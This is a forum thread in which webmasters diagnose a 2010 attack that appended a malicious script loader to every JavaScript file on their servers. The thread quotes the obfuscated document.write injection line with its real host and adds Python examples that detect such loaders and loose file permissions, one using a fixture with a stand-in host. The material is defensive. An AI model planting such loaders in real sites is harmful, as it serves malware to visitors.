  1. #1
    SitePoint Addict Latox's Avatar
    Join Date
    Dec 2008
    Location
    Australia
    Posts
    389

    Attention: Javascript Hack Going Around

    There is currently somebody, somewhere going around to websites/servers and editing their .js files.

    I was on my website today and saw "greatrow.ru" loading... I was like what the hell?

    So I opened httpfox, and saw a .js file loading into my site.

    Image: http://www.freemoviedb.com/imgs/greatrow_example.jpg

    I checked my source code, nothing had been changed.

    I checked my javascript files, ALL of the javascript files on the account had been edited at the same time, and this line had been placed at the bottom of each .js file:

    Code JavaScript:
    document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Unfriend.js"></scri'+'pt>');

    I then checked the other sites on my server, EVERY site on my server, EVERY javascript file on my server had this piece of code inserted at the bottom.

    The greatrow.ru site scans as a virus/malicious - so be careful, check your site - check your .js files.

    I didn't download anything nor give anyone access and every .js file was edited?

    Heads up!

    I'd like to hear some feedback on this also, as I'm not really knowledgeable when it comes to web security, hacking, etc.

    I'd also like to hear if it has happened to you.
    :-)

  2. #2
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    When performing website forensics, always look for the common denominator first.

    Is it your dedicated server?

    If so, who has FTP access to the root of the websites?

    What website software does each website have? WordPress? Joomla? osCommerce? ZenCart? All of these have been recent targets (as they are all the time). Be certain all your software is updated and the plugins too.

    Do you have the FTP logs? What about the access logs?

    Provide more details and I can help you solve the problem of "how".

  3. #3
    Non-Member
    Join Date
    Sep 2010
    Posts
    40
    Happened to me as well.
    But it was greatrow.ru/Web_host.js
    No one should have access to my FTP account, but it's webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
    I don't run any CMS or something, only like 5 PHP scripts which access the MySQL database and a single JavaScript file.
    Last edited by biggybiggysmally; Oct 3, 2010 at 11:57. Reason: please don't post links to mal sites

  4. #4
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    You're correct - nobody "should" have access to your FTP, but when you rule out the vulnerabilities of CMSs it sounds an awful lot like compromised FTP credentials.

    The way it typically happens is this: because there are so many viruses running around the Internet, many of today's best anti-virus products can't stop them all. Sometimes, a virus slips through the best defenses. These viruses look for the file containing the FTP credentials, read the info, and send it to a server, which then infects the website(s) it now has legitimate credentials for.

    First, I would suggest you change all FTP passwords - immediately.

    Second, scan all PCs for viruses. Make sure you do a full scan. Too many times we discover that people don't set their anti-virus programs to do full system scans. So, if a virus was released on Monday and your anti-virus program didn't get the signature until Tuesday, without doing a full system scan, your anti-virus program would never know it's there.

    Then, remove the infection from all your .js files and look at all .php files for any unnecessary base64_decode strings.

    Post back here with any other questions you have.
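
The clean-up check from the post above, as an added example that is not part of the original thread: it walks a web root, flags `.js` files containing a `document.write` script loader (undoing the `'sc'+'ript'` string splitting first) and lists every `base64_decode` call in `.php` files for manual review. The function names, the `allowed_hosts` parameter and the sample hosts `injected.example` and `cdn.example` are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Quote, plus, quote: the 'sc'+'ript' splits, removed before matching.
CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
# document.write('<script ... src="http://host/..."'); group 1 is the host.
LOADER = re.compile(
    r"""document\.write\s*\(\s*['"]<script\b[^>]*?\bsrc\s*=\s*\\?['"]?"""
    r"""(?:https?:)?//([^/'"\s>\\]+)""", re.IGNORECASE)
B64 = re.compile(r"\bbase64_decode\s*\(", re.IGNORECASE)


def scan_webroot(root, allowed_hosts=()):
    """Return sorted (relative_path, reason) pairs; allowed_hosts is lowercase."""
    findings = []
    for path in Path(root).rglob("*"):
        suffix = path.suffix.lower()
        if not path.is_file() or suffix not in (".js", ".php"):
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        if suffix == ".js":
            for host in LOADER.findall(CONCAT.sub("", text)):
                if host.lower() not in allowed_hosts:
                    findings.append((rel, "script loader -> " + host.lower()))
        else:
            for number, line in enumerate(text.splitlines(), 1):
                if B64.search(line):
                    findings.append((rel, "base64_decode at line %d" % number))
    return sorted(findings)


def build_sample(root):
    """Write a constructed tree; every host and file name here is made up."""
    Path(root, "js").mkdir()
    Path(root, "js", "menu.js").write_text(
        "function menu() {}\n"
        "document.write('<sc'+'ript type=\"text/javascript\" "
        "src=\"http://injected.example/x.js\"></scri'+'pt>');\n")
    Path(root, "js", "ads.js").write_text(
        "document.write('<script src=\"https://cdn.example/a.js\"></script>');\n")
    Path(root, "cache.php").write_text("<?php\n$x = base64_decode('AAAA');\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_webroot(tmp, allowed_hosts={"cdn.example"}))
```

A `base64_decode` hit is only a pointer for review, since legitimate code uses the function too; comparing flagged files against a known-good backup settles which ones were changed.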

  5. #5
    Non-Member
    Join Date
    Sep 2010
    Posts
    40
    There is no file containing the ftp credentials.
    Of course, I already removed the "infections".
    Website runs on a shared host. If the host gets hacked, I can't do anything against it.

  6. #6
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    What FTP software are you using?

  7. #7
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    First of all - ask your hosting provider to offer something more secure than FTP (SFTP or FTPS), so that at least your password is not sent unencrypted.

  8. #8
    SitePoint Enthusiast
    Join Date
    Nov 2009
    Posts
    37
    Quote: Originally Posted by biggybiggysmally
    Happened to me as well.
    But it was greatrow.ru/Web_host.js
    No one should have access to my FTP account, but it's webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
    I don't run any CMS or something, only like 5 PHP scripts which access the MySQL database and a single JavaScript file.

    Often other users' accounts on shared hosting can access your files if the file permissions are set to 777. It's then a simple matter using the compromised account to scan for writable files (html, php, js) and add the javascript to every writable file it finds on the server.
    phpSiteMinder - website backup and file integrity monitoring.
    Been hacked? phpSiteScanner can help you clean your site up.
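
An audit for the 777 problem described in the last post, as an added example that is not part of the original thread: it lists directories and web files under your own web root that carry the "other" write bit, and can clear group/other write on them. The function names and the sample tree are assumptions, as is the premise that owner-only write access suits the host's PHP setup.

```python
import os
import stat
import tempfile
from pathlib import Path

WEB_SUFFIXES = {".html", ".htm", ".php", ".js"}


def world_writable(root):
    """Return sorted (relative_path, octal_mode) for directories and web
    files under root that carry the 'other' write bit (777, 666, ...)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = Path(dirpath, name)
            mode = full.lstat().st_mode
            if stat.S_ISLNK(mode):
                continue  # a link's target is judged where it actually lives
            if stat.S_ISREG(mode) and full.suffix.lower() not in WEB_SUFFIXES:
                continue
            if mode & stat.S_IWOTH:
                rel = full.relative_to(root).as_posix()
                hits.append((rel, oct(stat.S_IMODE(mode))))
    return sorted(hits)


def tighten(root):
    """Clear group/other write on every hit (777 -> 755, 666 -> 644)."""
    fixed = world_writable(root)
    for rel, _ in fixed:
        full = Path(root, rel)
        current = stat.S_IMODE(full.stat().st_mode)
        full.chmod(current & ~(stat.S_IWGRP | stat.S_IWOTH))
    return fixed


if __name__ == "__main__":
    # Constructed tree: names and modes are made up for the demonstration.
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "js").mkdir()
        for rel, mode in (("js/app.js", 0o777), ("index.php", 0o644), ("js", 0o777)):
            Path(tmp, rel).touch()
            Path(tmp, rel).chmod(mode)
        print(tighten(tmp), world_writable(tmp))
```

If the host runs PHP under a different account than the file owner, upload or cache directories may stop working after tightening and need a host-specific arrangement instead of 777.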

